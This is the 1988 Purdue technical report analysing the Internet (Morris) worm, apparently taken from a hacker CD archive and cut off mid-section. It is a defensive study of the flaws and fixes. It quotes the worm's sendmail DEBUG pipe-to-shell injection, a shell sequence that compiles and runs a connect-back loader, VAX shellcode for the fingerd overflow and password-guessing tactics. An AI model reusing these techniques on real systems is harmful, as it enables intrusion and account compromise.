The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / pc / virus / tr823.doc < prev next >

Wrap

Text File | 2003-06-11 | 102.3 KB | 1,949 lines

The Internet Worm Program: An Analysis Purdue Technical Report CSD-TR-823 Eugene H. Spafford Department of Computer Sciences Purdue University West Lafayette, IN 47907-2004 spaf@cs.purdue.edu ABSTRACT On the evening of 2 November 1988, someone infected the Internet with a worm program. That program exploited flaws in utility programs in systems based on BSD-derived versions of UNIX. The flaws allowed the program to break into those machines and copy itself, thus infecting those systems. This infection eventually spread to thousands of machines, and disrupted normal activities and Internet connectivity for many days. This report gives a detailed description of the components of the worm program\320data and functions. It is based on study of two completely independent reverse-compilations of the worm and a version disassembled to VAX assembly language. Almost no source code is given in the paper because of current concerns about the state of the ``immune system'' of Internet hosts, but the description should be detailed enough to allow the reader to understand the behavior of the program. The paper contains a review of the security flaws exploited by the worm program, and gives some recommendations on how to eliminate or mitigate their future use. The report also includes an analysis of the coding style and methods used by the author$s$ of the worm, and draws some conclusions about his abilities and intent. Copyright 1988 by Eugene H. Spafford. All rights reserved. Permission is hereby granted to make copies of this work, without charge, solely for the purposes of instruction and research. Any such copies must include a copy of this title page and copyright notice. Any other reproduction, publication, or use is strictly prohibited without express written permission. November 29, 1988 The Internet Worm Program: An Analysis Purdue Technical Report CSD-TR-823 Eugene H. Spafford Department of Computer Sciences Purdue University West Lafayette, IN 47907-2004 spaf@cs.purdue.edu Introduction On the evening of 2 November 1988 the Internet came under attack >From within. Sometime round 6 PM EST, a program was executed on one or more hosts connected to the Internet. This program collected host, network, and user information, then broke into other machines ???using flaws present in those systems' software. After breaking in, the program would replicate itself and the replica would also attempt to infect other systems. Although the program would only infect Sun Microsystems Sun 3 systems, and VAX computers running variants of 4 BSD UNIX the program spread quickly, as did the confusion and consternation of system administrators and users as they discovered that their systems had been infected. Although UNIX has long been known to have some security weaknesses $cf. [Ritc79], [Gram84], and [Reid87]$, the scope of the breakins came as a great surprise to almost everyone. he program was mysterious to users at sites where it appeared. Unusual files were left in the usr/tmp directories of some machines, and strange messages appeared in the log files of some of the utilities, such as the sendmail mail handling agent. The most noticeable effect, however, was that systems became more and more loaded with running processes as they became repeatedly infected. As time went on, some of these machines became so loaded that they were unable to continue any processing; some machines failed completely when their swap space or process tables were exhausted. By late Thursday night, personnel at the University of California at Berkeley and at Massachusetts Institute of Technology had ``captured'' copies of the program and began to analyze it. People at other sites also began to study the program and were developing methods of eradicating it. A common fear was that the program was somehow tampering with system resources in a way that could not be readily detected and that while a cure was being sought, system files were being altered or information destroyed. By 5 AM EST Thursday morning, less than 12 hours after the infection started on the network, the Computer Systems Research Group at Berkeley had developed an interim set of steps to halt its spread. This included a preliminary patch to the sendmail mail agent, and the suggestion to rename one or both of the C compiler and loader to prevent their use. These suggestions were published in mailing lists and on the usenet, although their spread was hampered by systems disconnecting from the Internet to attempt a ``quarantine.'' By about 7 PM EST Thursday, another simple, effective method of stopping the infection, without renaming system utilities, was discovered at Purdue and also widely published. Software patches were posted by the Berkeley group at the same time to mend all the flaws that enabled the program to invade systems. All that remained was to analyze the code that caused the problems. On November 8, the National Computer Security Center held a hastily-convened workshop in Baltimore. The topic of discussion was the program and what it meant to the internet community. Who was at that meeting and why they were invited, and the topics discussed have not yet been made public. However, one thing we know that was decided by those present at the meeting was that they would not distribute copies of their reverse-engineered code to the general public. It was felt that the program exploited too many little-known techniques and that making it generally available would only provide other attackers a framework to build another such program. Although such a stance is well-intended, it can serve only as a delaying tactic. As of November 27, I am aware of at least five versions of the decompiled code, and because of the widespread distribution of the binary, I am sure there are at least ten times that many versions already completed or in progress and the required skills and tools are too readily available within the community to believe that only a few groups have the capability to reconstruct the source code. any system administrators, programmers, and managers are interested in how the program managed to establish itself on their systems and spread so quickly These individuals have valid interest in seeing the code, especially if they are software vendors. Their interest is not to duplicate the program, but to be sure that all the holes used by the program are properly plugged. Furthermore, examining the code may help administrators and vendors develop defenses against future attacks, despite the claims to the contrary by some of the individuals with copies of the reverse-engineered code. This report is intended to serve an interim role in this process. It is a detailed description of how the program works, but does not provide source code that could be used to create a new worm program. As such, this should be an aid to those individuals seeking a better understanding of how the code worked, yet it is in such a form that it cannot be used to create a new worm without considerable effort. Section 3 and Appendix C contain specific observations about some of the flaws in the system exploited by the program, and their fixes. A companion report, to be issued in a few weeks, will contain a history of the worm's spread through the Internet. This analysis is the result of a study performed on three separate reverse-engineered versions of the worm code. Two of these versions are in C code, and one in VAX assembler. All three agree in all but the most minor details. One C version of the code compiles to binary that is identical to the original code, except for minor differences of no significance. As such, I can state with some certainty that if there was only one version of the worm program, then it was benign in intent. The worm did not write to the file system except when transferring itself into a target system. It also did not transmit any information from infected systems to any site, other than copies of the worm program itself. Since the Berkeley Computer Systems Research Group as already published official fixes to the flaws exploited by the program, we do not have to worry about these specific attacks being used again. Many vendors have also issued appropriate patches. It now remains to convince the remaining vendors to issue fixes, and users to install them. Terminology There seems to be considerable variation in the names applied to the program described in this paper. I use the term worm instead of virus based on its behavior. Members of the press have used the term virus, possibly because their experience to date has been only with that form of security problem. This usage has been reinforced by quotes from computer managers and programmers also unfamiliar with the terminology. For purposes of clarifying the terminology, let me define the difference between these two terms and give some citations to their origins: worm is a program that can run by itself and can propagate a fully working version of itself to other machines. It is derived from the word tapeworm, a parasitic organism that lives inside a host and saps its resources to maintain itself. virus is a piece of code that adds itself to other programs, including operating systems. it cannot run independently and it requires that its ``host'' program be run to activate it. As such, it has a clear analog to biological viruses and those viruses are not considered alive in the usual sense; instead, they invade host cells and corrupt them, causing them to produce new viruses. The program that was loosed on the Internet was clearly a worm. 2.1. Worms The concept of a worm program that spreads itself from machine to (machine was apparently first described by John Brunner in 1975 in his classic science fiction novel The Shockwave Rider. [Brun75] He called these programs tapeworms that lived ``inside'' the computers and spread themselves to other machines. In 1979-1981, researchers at Xerox PARC built and experimented with worm programs. They reported their experiences in an article in 1982 in Communications of the ACM. [Shoc82] The worms built at PARC were designed to travel from machine to machine and do useful work in a distributed environment. They were not used at that time to break into systems, although some did ``get away'' during the tests. A few people seem to prefer to call the Internet Worm a virus because it was destructive, and they believe worms are non-destructive. Not everyone agrees that the Internet Worm was destructive, however. Since intent and effect are sometimes difficult to judge, using those as a naming criterion is clearly insufficient. As such, worm continues to be the clear choice to describe this kind of program. 2.2. Viruses The first (use of the word virus $to my knowledge$ to describe something that infects a computer was by David Gerrold in his science fiction short stories about the G.O.D. machine. These stories were later combined and expanded to form the book When Harlie Was One. [Gerr72] (A subplot in that book described a program named VIRUS created by an unethical scientist. A computer infected with VIRUS would randomly dial the phone until it found another computer. It would then break into that system and infect it with a copy of VIRUS. This program would infiltrate the system software and slow the system down so much that it became unusable except to infect other machines\). The inventor had plans to sell a program named VACCINE that could cure VIRUS and prevent infection, but disaster occurred when noise on a phone line caused VIRUS to mutate so VACCINE ceased to be effective. The term computer virus was first used in a formal way by Fred Cohen at USC. [Cohe84] He defined the term to mean a security problem that attaches itself to other code and turns it into something that produces viruses; to quote from his paper: ``We define a computer `virus' as a program that can infect other programs by modifying them to include a possibly evolved copy of itself.'' He claimed the first computer virus was ``born'' on November 3, 1983, written by himself for a security seminar course. The interested reader may also wish to consult [Denn88] and [Dewd85] for further discussion of the terms. 3. Flaws and Misfeatures 3.1. Specific Problems The actions of the Internet Worm exposed some specific security flaws in standard services provided by BSD-derived versions of UNIX. Specific patches for these flaws have been widely circulated in days since the worm program attacked the Internet. Those flaws and patches are discussed here. 3.1.1. fingerd and gets The finger program is a utility that allows users to obtain information about other users. It is usually used to identify the full name or login name of a user, whether or not a user is currently logged in, and possibly other information about the person such as telephone numbers where he or she can be reached. The fingerd program is intended to run as a daemon, or background process, to service remote requests using the finger protocol. [Harr77] The bug exploited to break fingerd involved overrunning the buffer the daemon used for input. The standard C library has a few routines that read input without checking for bounds on the buffer involved. In particular, the gets call takes input to a buffer without doing any bounds checking; this was the call exploited by the worm. The gets routine is not the only routine with this flaw. The family of routines scanf/fscanf/sscanf may also overrun buffers when decoding input unless the user explicitly specifies limits on the number of characters to be converted. Incautious use of the sprintf routine can overrun buffers. Use of the strcat/strcpy calls instead of the strncat/strncpy routines may also overflow their buffers. Although experienced C programmers are aware of the problems with these routines, they continue to use them. Worse, their format is in some sense codified not only by historical inclusion in UNIX and the C language, but more formally in the forthcoming ANSI language standard for C. The hazard with these calls is that any network server or privileged program using them may possibly be compromised by careful precalculation of the inappropriate input. An important step in removing this hazard would be first to develop a set of replacement calls that accept values for bounds on their program-supplied buffer arguments. Next, all system servers and privileged applications should be examined for unchecked uses of the original calls, with those calls then being replaced by the new bounded versions. Note that this audit has already been performed by the group at Berkeley; only the fingerd and timed servers used the gets call, and patches to fingerd have already been posted. Appendix C contains a new version of fingerd written specifically for this report that may be used to replace the original version. This version makes no calls to gets. 3.1.2. Sendmail The sendmail program is a mailer designed to route mail in a heterogeneous internetwork. [Allm83] The program operates in a number of modes, but the one of most interest is when it is operating as a daemon process. In this mode, the program is ``listening'' on (a TCP port $#25$ for attempts to deliver mail using standard Internet protocols, principally SMTP $Simple Mail Transfer Protocol$. [Post82] When such a request is detected, the daemon enters into a dialog with the remote mailer to determine sender, recipient, delivery instructions, and message contents. The bug exploited in sendmail had to do with functionality provided by a debugging option in the code. The worm would issue the DEBUG command to sendmail and then specify a set of commands instead of a user address as the recipient of the message. Normally, this (is not allowed, but it is present in the debugging code to allow testers to verify that mail is arriving at a particular site without the need to activate the address resolution routines. The debug option of sendmail is often used because of the complexity of configuring the mailer for local conditions, and many vendors and site administrators leave the debug option compiled in. The sendmail program is of immense importance on most Berkeley-derived $and other$ UNIX systems because it handles the complex tasks of mail routing and delivery. Yet, despite its importance and wide-spread use, most system administrators (know little about how it works. Stories are often related about how system administrators will attempt to write new device drivers or otherwise modify the kernel of the OS, yet they will not willingly attempt to modify sendmail or its configuration files. It is little wonder, then, that bugs are present (in sendmail that allow unexpected behavior. Other flaws have been found and reported now that attention has been focused on the program, but it is not known for sure if all the bugs have been discovered and all the patches circulated. One obvious approach would be to dispose of sendmail and come (up with a simpler program to handle mail. Actually, for purposes of verification, developing a suite of cooperating programs would be a better approach, and more aligned with the UNIX philosophy. In effect, sendmail is fundamentally flawed, not because of anything related to function, (but because it is too complex and difficult to understand. The Berkeley Computer Systems Research Group has a new version of sendmail with many bug fixes and fixes for security flaws. This version of sendmail is available for FTP from the host ``ucbarpa.berkeley.edu'' and will be present in the file ~ftp/pub/sendmail.tar.Z by the end of November 1988. Note that this version is shipped with the DEBUG option disabled by default. However, this does not help system administrators who wish to enable the DEBUG option, although the researchers at Berkeley believe they have fixed (all the security flaws inherent in that facility. One approach that could be taken with the program would be to have it prompt the user for the password of the super user $root$ when the DEBUG command is given. A static password should never be compiled into the program because (this would mean that the same password might be present at multiple sites and seldom changed. For those sites without access to FTP or otherwise unable to obtain the new version, the official patches to sendmail are enclosed in Appendix D. 3.2. Other Problems Although the worm exploited flaws in only two server programs, its behavior has served to illustrate a few fundamental problems that have not yet been widely addressed. In the interest of promoting better security, some of these problems are discussed here. (The interested reader is directed to works such as [Gram84] for a broader discussion of related issues. 3.2.1. Servers in general A security flaw not exploited by the worm, but now becoming obvious, is that many system services have configuration and command files owned by the same userid. Programs like sendmail, the at service, and other facilities are often all owned by the same (non-user id. This means that if it is possible to abuse one of the services, it might be possible to abuse many. One way to deal with the general problem is have every daemon and subsystem run with a separate userid. That way, the command and data files for each subsystem could (be protected in such a way that only that subsystem could have write $and perhaps read$ access to the files. This is effectively an implementation of the principle of least privilege. Although doing this might add an extra dozen user ids to the system, it is a small (cost to pay, and is already sup ported in the UNIX paradigm. Services that should have separate ids include sendmail, news, at, finger, ftp, uucp and YP. 3.2.2. Passwords A key attack of the worm program involved attempts to discover user passwords. It was able to determine success because the encrypted password of each user was in a publicly readable file. This allows an attacker to encrypt lists of possible passwords and then compare them against the actual passwords without passing through any system function. In effect, the security of the passwords is provided in large part by the prohibitive effort of trying all combinations of letters. Unfortunately, as machines get faster, the cost of such attempts decreases. Dividing the task among multiple processors further reduces the time needed to decrypt a password. It (is currently feasible to use a supercomputer to precalculate all probable passwords and store them on optical media. Although not $currently$ portable, this scheme would allow someone with the appropriate resources access to any account for which they could read the password field and then consult (their database of pre-encrypted passwords. As the density of storage media increases, this problem will only get more severe. A clear approach to reducing the risk of such attacks, and an approach that has already been taken in some variants of UNIX, would be to have a (shadow) password file. The encrypted passwords are saved in a file that is readable only by the system administrators, and a privileged call performs password encryptions and comparisons with an appropriate delay $.5 to 1 second, for instance$. This would prevent any attempt to ``fish'' for passwords. Additionally, a threshold could be included to check for repeated password attempts from the same process, resulting in some form of alarm being raised. Shadow password files should be used in combination with encryption rather than in place of such techniques, however, or one problem is simply replaced by a different one; the combination of the two methods is stronger than either one alone. Another way to strengthen the password mechanism would be to change the utility that sets user passwords. The utility currently makes minimal attempt to ensure that new passwords are nontrivial to guess. The program could be strengthened in such a way that it would reject any choice of a word currently in the on-line dictionary or based on the account name. 4. High-Level Description of the Worm This section contains a high-level overview of how the worm program functions. The description in this section assumes that the reader is familiar with UNIX and somewhat familiar with network facilities under UNIX. Section 5 describes the individual functions and structures in more detail. The worm consists of two parts: a main program, and a bootstrap or vector program $described in Appendix B$. We will start our description from the point at which a host is about to be infected. At this point, a worm running on another machine has either succeeded in establishing a shell on the new host and has connected back to the infecting machine via a TCP connection, or it has connected to the SMTP port and is transmitting to the sendmail program. The infection proceeded as follows: 1\) A socket was established on the infecting machine for the vector program to connect to $e.g., socket number 32341$. A challenge string was constructed >From a random number $e.g., 8712440$. A file name base was also constructed using a random number $e.g., 14481910$. 2\) The vector program was installed and executed using one of two methods: 2a\) Across a TCP connection to a shell, the worm would send the following commands $the two lines beginning with ``cc'' were sent as a single line$: PATH=/bin:/usr/bin:/usr/ucb cd /usr/tmp echo gorch49; sed '/int zz/q' > x14481910.c;echo gorch50 [text of vector program\320enclosed in Appendix B] int zz; cc (-o x14481910 x14481910.c;./x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c;echo DONE Then it would wait for the string ``DONE'' to signal that the vector program was running. 2b\) Using the SMTP connection, it would transmit $the two lines beginning with ``cc'' were sent as a single line$: debug mail from: </dev/null> rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<'EOF' [text of vector program\320enclosed in Appendix III] EOF cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c . quit The infecting worm would then wait for up to 2 minutes on the designated port for the vector to contact it. 3\) The vector program then connected to the ``server,'' sent the challenge string, and transferred three files: a Sun 3 binary version of the worm, a VAX version, and the source code for the vector program. After the files were copied, the running vector program became $via the execl call$ the shell with its input and output still connected to the server worm. 4\) The server worm sent the following command stream to the connected shell: PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then P=x14481910 else P=sh fi Then, for each binary file it had transferred $just two in this case, although the code is written (to allow more$, it would send the following form of command sequence: cc -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.o x14481910,vax.o x14481910,l1.c rm -f $P The rm would succeed only if the linked version of the worm failed to start execution. If the server determined that the host was now infected, it closed the connection. Otherwise, it would try the other binary file. After both binary files had been tried, it would send over rm commands for the object files to clear away all evidence of the attempt at infection. 5\) The new worm on the infected host proceeded to ``hide'' itself by obscuring its argument vector, unlinking the binary version of itself, and killing its parent $the $$ argument in the invocation$. It then read into memory each of the worm binary files, encrypted each file after reading it, and deleted the files from disk. 6\) Next, the new worm gathered information about network interfaces and hosts to which the local machine was connected. It built lists of these in memory, including information about canonical and alternate names and addresses. It gathered some of this information by making direct ioctl calls, and by running the netstat program with various arguments. It also read through various system files looking for host names to add to its database. 7\) It randomized the lists it constructed, then attempted to infect some of those hosts. For directly connected networks, it created a list of possible host numbers and attempted to infect those hosts if they existed. Depending on the type of host $gateway or local network$, the worm first tried to establish a connection on the telnet or rexec ports to determine reachability before it attempted one of the infection methods. 8\) The infection attempts proceeded by one of three routes: rsh, fingerd, or sendmail. 8a\) The attack via rsh was done by attempting to spawn a remote shell by invocation of $in order of trial$ /usr/ucb/rsh, /usr/bin/rsh, and /bin/rsh. If successful, the host was infected as in steps 1 and 2a, above. 8b\) The attack via the finger daemon was somewhat more subtle. A connection was established to the remote finger server daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack. For standard 4 BSD versions running on VAX computers, the overflow resulted in the return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack. The instructions that were written into the stack at that location were: pushl $68732f '/sh\\0' pushl $6e69622f '/bin' movl sp, r10 pushrl $0 pushrl $0 pushrl r10 pushrl $3 movl sp,ap chmk $3b That (is, the code executed when the main routine attempted to return was: execve$"/bin/sh", 0, 0$ On VAXen, this resulted in the worm connected to a remote shell via the TCP connection. The worm then proceeded to infect the host as in steps 1 and 2a, (above. On Suns, this simply resulted in a core file since the code was not in place to corrupt a Sun version of fingerd in a similar fashion. 8c\) The worm then tried to infect the remote host by establishing a connection to the SMTP port and mailing an (infection, as in step 2b, above. Not all the steps were attempted. As soon as one method succeeded, the host entry in the internal list was marked as infected and the other methods were not attempted. 9\) Next, it entered a state machine consisting of five states. Each state (was run for a short while, then the program looped back to step #7 $attempting to break into other hosts via sendmail, finger, or rsh $. The first four of the five states were attempts to break into user accounts on the local machine. The fifth state was the final state, and occurred after all attempts had been made to break all passwords. In the fifth state, the worm looped forever trying to infect hosts in its internal tables and marked as not yet infected. The four states were: 9a\) The worm read through the /etc/hosts.equiv files and /.rhosts files to find the names of equivalent hosts. These were marked in the internal table of hosts. Next, the worm read the /etc/passwd file into an internal data structure. As it was doing this, it also examined the .forward file in each user home directory and included those host names in its internal table of hosts to try. Oddly, it did not similarly check user .rhosts files. 9b\) The worm attempted to break each user password using simple choices. The worm checked the obvious case of no password. Then, it used the account name and GECOS field to try simple passwords. Assume that the user had an entry in the password file like: account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh then the words tried as potential passwords would be account, accountaccount, User, Name, user, name, and tnuocca. These are, respectively, the account name, the account name concatenated with itself, the first and last names of the user, the user names with leading capital letters turned to lower case, and the account name reversed. Experience described in [Gram84] indicates that on systems where users are naive about password security, these choices may work for up to 30% of user passwords. Step 10 in this section describes what was done if a password ``hit'' was achieved. 9c\) The third stage in the process involved trying to break the password of each user by trying each word present in an internal dictionary of words $see Appendix I$. This dictionary of 432 words was tried against each account in a random order, with ``hits'' being handled as described in step 10, below. 9d\) The fourth stage was entered if all other attempts failed. For each word in the file /usr/dict/words, the worm would see if it was the password to any account. In addition, if the word in the dictionary began with an upper case letter, the letter was converted to lower case and that word was also tried against all the passwords. 10\) Once a password was broken for any account, the worm would attempt to break into remote machines where that user had accounts. The worm would scan the .forward and .rhosts files of the user at this point, and identify the names of remote hosts that had accounts used by the target user. It then attempted two attacks: 10a\) The worm would first attempt to create a remote shell using the rexec service. The attempt would be made using the account name given in the .forward or .rhosts file and the user's local password. This took advantage of the fact that users often have the same password on their accounts on multiple machines. 10b\) The worm would do a rexec to the current host $using the local user name and password$ and would try a rsh command to the remote host using the username taken from the file. This attack would succeed in those cases where the remote machine had a hosts.equiv file or the user had a .rhosts file that allowed remote execution without a password. If the remote shell was created either way, the attack would continue as in steps 1 and 2a, above. No other use was made of the user password. Throughout the execution of the main loop, the worm would check for other worms running on the same machine. To do this, the worm would attempt to connect to another worm on a local, predetermined TCP socket. 9 If such a connection succeeded, one worm would $randomly$ set its pleasequit variable to 1, causing that worm to exit after it had reached partway into the third stage of password cracking. This delay is part of the reason many systems had multiple worms running: even though a worm would check for other local worms, it would defer its self-destruction until significant effort had been made to break local passwords. One out of every seven worms would become immortal rather than check for other local worms. This was probably done to defeat any attempt to put a fake worm process on the TCP port to kill existing worms. It also contributed to the load of a machine once infected. The worm attempted to send an UDP packet to the host ernie.berkeley.edu 10 approximately once every 15 infections, based on a random number comparison. The code to do this was incorrect, however, and no information was ever sent. Whether this was the intended ruse or whether there was actually some reason for the byte to be sent is not currently known. However, the code is such that an uninitialized byte is the intended message. It is possible that the author eventually intended to run some monitoring program on ernie $after breaking into an account, no doubt$. Such a program could obtain the sending host number from the single-byte message, whether it was sent as a TCP or UDP packet. However, no evidence for such a program has been found and it is possible that the connection was simply a feint to cast suspicion on personnel at Berkeley. The worm would also fork itself on a regular basis and kill its parent. This served two purposes. First, the worm appeared to keep changing its process id and no single process accumulated excessive amounts of cpu time. Secondly, processes that have been running for a long time have their priority downgraded by the scheduler. By forking, the new process would regain normal scheduling priority. This mechanism did not always work correctly, either, as we locally observed some instances of the worm with over 600 seconds of accumulated cpu time. If the worm ran for more than 12 hours, it would flush its host list of all entries flagged as being immune or already infected. The way hosts were added to this list implies that a single worm might reinfect the same machines every 12 hours. 5. A Tour of the Worm The following is a brief, high-level description of the routines present in the worm code. The description covers all the significant functionality of the program, but does not describe all the auxiliary routines used nor does it describe all the parameters or algorithms involved. It should, however, give the user a complete view of how the worm functioned. 5.1. Data Structures The worm had a few global data structures worth mentioning. Additionally, the way it handled some local data is of interest. 5.1.1. Host list The worm constructed a linked list of host records. Each record contained an array of 12 character pointers to allow storage of up to 12 host names/aliases. Each record also contained an array of six long unsigned integers for host addresses, and each record contained a flag field. The only flag bits used in the code appear to be 0x01 $host was a gateway$, 0x2 $host has been infected$, 0x4 $host cannot be infected \320 not reachable, not UNIX, wrong machine type$, and 0x8 $host was ``equivalent'' in the sense that it appeared in a context like .rhosts file$. 5.1.2. Gateway List The worm constructed a simply array of gateway IP addresses through the use of the system netstat command. These addresses were used to infect directly connected networks. The use of the list is described in the explanation of scan_gateways and rt_init, below. 5.1.3. Interfaces list An array of records was filled in with information about each network interface active on the current host. This included the name of the interface, the outgoing address, the netmask, the destination host if the link was point-to-point 11 , and the interface flags. 5.1.4. Pwd A linked list of records was built to hold user information. Each structure held the account name, the encrypted password, the home directory, the gecos field, and a link to the next record. A blank field was also allocated for decrypted passwords as they were found. 5.1.5. objects The program maintained an array of ``objects'' that held the files that composed the worm. Rather than have the files stored on disk, the program read the files into these internal structures. Each record in the list contained the suffix of the file name $e.g., ``sun3.o''$, the size of the file, and the encrypted contents of the file. The use of this structure is described below. 5.1.6. Words A mini-dictionary of words was present in the worm to use in password guessing $see Appendix A$. The words were stored in an array, and every word was masked $XOR$ with the bit pattern 0x80. Thus, the dictionary would not show up with an invocation of the strings program on the binary or object files. 5.1.7. Embedded Strings Every text string used by the program, without exception, was masked $XOR$ with the bit pattern 0x81. Every time a string was referenced, it was referenced via a call to XS. The XS function decrypted the requested string in a static circular buffer and returned a pointer to the decrypted version. This also kept any of the text strings in the program from appearing during an invocation of strings. Simply clearing the high order bit $e.g., XOR 0x80$ or displaying the program binary would not produce intelligible text. All references to XS have been omitted from the following text; realize that every string was so encrypted. It is not evident how the strings were placed in the program in this manner. The masked strings were present inline in the code, so some preprocessor or a modified version of the compiler must have been used. This represents a significant effort by the author of the worm, and suggests quite strongly that the author wanted to complicate or prevent the analysis of the program once it was discovered. 5.2. Routines The descriptions given here are arranged in alphabetic order. The names of some routines are exactly as used by the author of the code. Other names are based on the function of the routine, and those names were chosen because the original routines were declared static and name information was not present in the object files. If the reader wishes to trace the functional \257ow of the worm, begin with the descriptions of routines main and doit $presented first for this reason$. By function, the routines can be $arbitrarily$ grouped as follows: setup and utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host, h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor, permute, rt_init, supports_rsh, and supports_telnet. network & password attacks : attack_network, attack_user, crack_0, crack_1, crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect, scan_gateways, sendworm, try_fingerd, try_password, try_rsh, try_sendmail, and waithit. camouflage: checkother, other_sleep, send_message, and xorbuf. 5.2.1. main This was where the program started. The first thing it did was change its argument vector to make it look like it was the shell running. Next, it set its resource limits so a failure would not drop a core file. Then it loaded all the files named on the command line into the object structure in memory using calls to loadobject. If the file was not one of the objects loaded, the worm would immediately call exit. Next, the code unlinked all the object files, the file named sh $the worm itself$, and the file /tmp/.dumb $apparently a remnant of some earlier version of the program, possibly used as a restraint or log during testing\320the file is not otherwise referenced$. The program then finished zeroing out the argument vector. Next, the code would call if_init. If no interfaces were discovered by that routine, the program would call exit. The program would then get its current process group. If the process group was the same as its parent process id $passed on the command line$, it would reset its process group and send a KILL signal to its parent. Last of all, the routine doit was invoked. 5.2.2. doit This was the main worm code. First, a variable was set to the current time with a call to time, and the random number generator was initialized with the return value. Next, the routines hg and hl were invoked to infect some hosts. If one or both of these failed to infect any hosts, the routine ha was invoked. Next, the routine checkother was called to see if other worms were on this host. The routine send_message was also called to cast suspicion on the folks at Berkeley. 12 The code then entered an infinite loop: A call would be made to cracksome followed by a call to other_sleep with a parameter of 30. Then cracksome would be called again. At this point, the process would fork itself, and the parent would exit, leaving the child to continue. Next, the routines hg, ha, and hi would all be called to infect other hosts. If any one $or combination$ of these routines failed to infect a new host, the routine hl would be called to infect a local host. Thus, the code was aggressive about always infecting at least one host each pass through this loop. The logic here was faulty, however, because if all known gateway hosts were infected, or a bad set of host numbers were tried in ha, this code would call hl every time through the loop. Such behavior was one of the reasons hosts became overloaded with worm processes: every pass through the loop, each worm would likely be forced to infect another local host. Considering that multiple worms could run on a host for some time before one would exit, this could lead to an exponential growth of worms in a LAN environment. Next, the routine other_sleep was called with a timeout of 120. A check was then made to see if the worm had run for more than 12 hours. If so, a call was made to h_clean. Finally, a check was made of the pleasequit and nextw variables $set in other_sleep or checkother, and crack_2, respectively$. If pleasequit was nonzero, and nextw was greater than 10, the worm would exit. 5.2.3. attack_network This routine was designed to infect random hosts on a subnet. First, for each of the network interfaces, if checked to see if the target host was on a network to which the current host was directly connected. If so, the routine immediately returned. 13 Based on the class of the netmask $e.g., Class A, Class B$, the code constructed a list of likely network numbers. A special algorithm was used to make good guesses at potential Class A host numbers. All these constructed host numbers were placed in a list, and the list was then randomized using permute. If the network was Class B, the permutation was done to favor low- numbered hosts by doing two separate permutations\320the first six hosts in the output list were guaranteed to be chosen from the first dozen $low-numbered$ host numbers generated. The first 20 entries in the permuted list were the only ones examined. For each such IP address, its entry was retrieved from the global list of hosts $if it was in the list$. If the host was in the list and was marked as already infected or immune, it was ignored. Otherwise, a check was made to see if the host supported the rsh command $identifying it as existing and having BSD-derived networking services$ by calling supports_rsh. If the host did support rsh, it was entered into the hosts list if not already present, and a call to infect was made for that host. If a successful infection occurred, the routine returned early with a value of TRUE $1$. 5.2.4. attack_user This routine was called after a user password was broken. It has some incorrect code and may not work properly on every architecture because a subroutine call was missing an argument. However, on Suns and VAXen, the code will work because the missing argument was supplied as an extra argument to the previous call, and the order of the arguments on the stack matches between the two routines. It was largely a coincidence that this worked. The routine attempted to open a .forward file in the the user's home directory, and then for each host and user name present in that file, it called the hul routine. It then did the same thing with the .rhosts file, if present, in the user's home directory. 5.2.5. checkother This routine was to see if another worm was present on this machine and is a companion routine to other_sleep. First, a random value was checked: with a probability of 1 in 7, the routine returned without ever doing anything\320these worms become immortal in the sense that they never again participated in the process of thinning out multiple local worms. Otherwise, the worm created a socket and tried to connect to the local ``worm port''\320 23357. If the connection was successful, an exchange of challenges was made to verify that the other side was actually a fellow worm. If so, a random value was written to the other side, and a value was read from the socket. If the sum of the value sent plus the value read was even, the local worm set its pleasequit variable to 1, thus marking it for eventual self- destruction. The socket was then closed, and the worm opened a new socket on the same port $if it was not destined to self- destruct$ and set other_fd to that socket to listen for other worms. If any errors were encountered during this procedure, the worm involved set other_fd to -1 and it returned from the routine. This meant that any error caused the worm to be immortal, too. 5.2.6. crack_0 This routine first scanned the /etc/hosts.equiv file, adding new hosts to the global list of hosts and setting the \257ags field to mark them as equivalent. Calls were made to name2host and getaddrs. Next, a similar scan was made of the /.rhosts file using the exact same calls. The code then called setpwent to open the /etc/passwd file. A loop was performed as long as passwords could be read: Every 10th entry, a call was made to other_sleep with a timeout of 0. For each user, an attempt was made to open the file .forward 14 in the home directory of that user, and read the hostnames therein. These hostnames were also added to the host list and marked as equivalent. The encrypted password, home directory, and gecos field for each user was stored into the pwd structure. After all user entries were read, the endpwent routine was invoked, and the cmode variable was set to 1. 5.2.7. crack_1 This routine tried to break passwords. It looped until all accounts had been tried, or until the next group of 50 accounts had been tested. In the loop: A call was made to other_sleep with a parameter of zero each time the loop index modulo 10 was zero $i.e., every 10 calls$. Repeated calls were made to try_password with the values discussed earlier in \2474-8b. Once all accounts had been tried, the variable cmode was set to 2. 5.2.8. crack_2 This routine used the mini-dictionary in an attempt to break user passwords $see Appendix A$. The dictionary was first permuted $using the permute$ call. Each word was decrypted in- place by XORing its bytes with 0x80. The decrypted word was then passed to the try_password routine for each user account. The word was then re-encrypted. A global index, named nextw was incremented to point to the next dictionary entry. The nextw index is also used in doit to determine if enough effort had been expended so that the worm could ``...go gently into that good night.'' When no more words were left, the variable cmode was set to 3. There are two interesting points to note in this routine: the reverse of these words were not tried, although that would seem like a logical thing to do, and all words were encrypted and decrypted in place rather than in a temporary buffer. This is less efficient than a copy while masking since no re-encryption ever needs to be done. As discussed in the next section, many examples of unnecessary effort such as this were present in the program. Furthermore, the entire mini-dictionary was decrypted all at once rather than a word at a time. This would seem to lessen the benefit of encrypting those words at all, since the entire dictionary would then be present in memory as plaintext during the time all the words were tried. 5.2.9. crack_3 This was the last password cracking routine. It opened /usr/dict/words, and for each word found it called try_password against each account. If the first letter of the word was a capital, it was converted to lower case and retried. After all words were tried, the variable cmode was incremented and the routine returned. In this routine, no calls to other_sleep were interspersed, thus leading to processes that ran for a long time before checking for other worms on the local machine. Also of note, this routine did not try the reverse of 